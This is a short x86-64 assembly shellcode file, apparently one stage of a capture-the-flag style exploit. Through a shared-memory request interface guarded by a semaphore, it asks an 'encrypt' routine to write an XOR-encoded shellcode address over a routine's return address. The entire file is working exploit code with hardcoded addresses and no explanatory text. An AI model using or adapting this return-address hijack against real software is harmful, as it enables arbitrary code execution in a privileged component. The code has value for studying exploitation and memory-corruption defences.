[BITS 64]

section .text
global _start
_start:

mov edi, [0x6024a8] ; user_kernel_semid
xor esi, esi
mov eax, 0x401A90 ; decrement_sem
call rax

push qword [rel data]
mov rax, [0x602498] ; user_kernel_shm
mov qword [rax], 92 ; encrypt
mov qword [rax + 8], rsp
mov rcx, [rel dst]
mov qword [rax + 16], rcx
mov qword [rax + 24], 0x8

mov edi, [0x6024a8] ; user_kernel_semid
xor esi, esi
mov eax, 0x401AC0 ; increment_sem
call rax

int3

data:
dq 0x7473656572628072 ; xored_shellcode_addr
dst:
dq 0x60007cfd8 ; do_encrypt return addr